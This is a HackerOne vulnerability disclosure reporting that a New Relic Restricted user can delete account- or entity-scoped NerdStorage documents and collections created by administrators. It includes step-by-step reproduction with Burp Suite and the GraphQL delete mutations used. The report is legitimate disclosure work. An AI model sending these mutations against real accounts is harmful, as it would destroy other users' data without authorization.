New Relic: Restricted user can remove NerdStorage documents/collections scoped to ACCOUNT or ENTITY

2019-12-30T17:42:27
ID H1:766145
Type hackerone
Reporter skavans
Modified 2020-08-13T15:40:49

Description

Hey team,

I've found that the Restricted user can remove both documents and whole collections of NerdStorage documents which are scoped to ACCOUNT and ENTITY. I don't know if this is a vulnerability or not, but I think it would be better for you to discuss this internally.

According to docs, if a user is signed in the account (or can see the entity), he/she can read and write within the corresponding NerdStorage scopes: {F671723} But, since the Restricted user is usually not allowed to perform destructive actions against the NR data, I think it is a subject for discussion at least. I think that there is a possible attack scenario when the full-fledged account users save some data inside some Nerdpack application (which uses the collections scoped to a whole ACCOUNT or many different ENTITies) and then the Restricted user can easily remove all the data saved by these users.

Steps to reproduce

1) Sign in NR with Admin user 2) Navigate to https://api.newrelic.com/graphiql, intercept the request to nerd-graph.service.newrelic.com with Burp Suite. 3) Change the Content-Type value to application/graphql, change the body to the graphql mutation { m1: nerdStoreWriteDocument ( collection: "test_account_collection" documentId: "doc1" document: "{\"data\": 1}" scope: { id: "2385914" name: ACCOUNTS } ) m2: nerdStoreWriteDocument ( collection: "test_account_collection" documentId: "doc2" document: "{\"data\": 2}" scope: { id: "2385914" name: ACCOUNTS } ) } replacing the 2385914 with your own account ID. Send the request. Thus, you saved some data scoped to your whole account into the NerdStorage. 4) Sign in NR with Restricted user 5) Navigate to https://api.newrelic.com/graphiql, intercept the request to nerd-graph.service.newrelic.com with Burp Suite. 6) Change the Content-Type value to application/graphql, change the body to graphql query { currentUser { account ( id: 2385914 ) { nerdStoreCollection ( collection: "test_account_collection" ) { document id } } } } replacing the 2385914 with your own account ID. Send the request and make sure there are 2 documents stored in collection test_account_collection scoped to a whole your account: {F671732} 7) Change the request body to graphql mutation { nerdStorageDeleteDocument ( collection: "test_account_collection" scope: { id: "2385914" name: ACCOUNT } documentId: "doc1" ) { deleted } } replacing the 2385914 with your own account ID. Send the request. 8) Execute the query from step 6 again. Make sure the document doc1 saved by Admin user is removed: {F671733} 9) Change the request body to graphql mutation { nerdStorageDeleteCollection ( collection: "test_account_collection" scope: { id: "2385914" name: ACCOUNT } ) { deleted } } replacing the 2385914 with your own account ID. Send the request. 10) Execute the query from step 6 again. Make sure the collection saved by Admin user was successfully removed by you (Restricted user): {F671734}

Remediation

In my opinion, you should either restrict the destructive GraphQL mutations for the Restricted user at all or allow him to only remove the NerdStorage entities which were created by himself. In the second case, the Restricted user will be able to create new collections or inject new documents inside existing collections and remove all of them, but he won't be able to remove the ones created/injected by full-fledged account users.

Impact

The Restricted user can remove NerdStore documents/collections created by full-fledged account users.